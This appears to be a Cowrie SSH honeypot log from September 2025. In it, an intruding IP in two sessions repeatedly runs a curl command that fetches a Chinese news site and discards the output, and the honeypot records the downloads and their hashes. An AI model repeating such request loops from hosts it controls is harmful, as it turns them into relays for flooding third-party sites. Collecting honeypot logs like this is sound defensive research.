{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.714004Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.717341Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.723624Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.725383Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.726283Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.746934Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.754633Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.755775Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.766312Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.767432Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.777394Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.802853Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.804064Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.820008Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.821145Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.861388Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.862674Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.900245Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.943166Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.949835Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.966625Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.967986Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:41.997610Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:41.998844Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.033232Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.036120Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.051874Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.053159Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.056168Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.057127Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.080715Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.111508Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.112815Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.128205Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.130105Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.171140Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.178948Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.180100Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.182243Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.183309Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.185437Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.194192Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.245591Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.246996Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.249992Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.251715Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.287947Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.291949Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.293035Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.295254Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.296415Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.351355Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.352640Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.355922Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.357200Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.358551Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.386098Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.386995Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.396273Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.397385Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.403099Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.404197Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.424198Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.432487Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.433563Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.441125Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.442419Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.443753Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.452311Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.465181Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.467828Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.468648Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.480687Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.481843Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.503703Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.508831Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.510734Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.518964Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.520075Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.549925Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.551619Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.558886Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.561779Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.563339Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.589323Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.590587Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.600824Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.602209Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.626492Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.627734Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.645547Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.646599Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.649132Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.652656Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.662706Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.663819Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.685887Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.687144Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.692353Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.700289Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.701530Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.726706Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.727882Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.736334Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.737411Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.747158Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.748264Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.770247Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.771426Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.785675Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:42.786751Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:42.820826Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
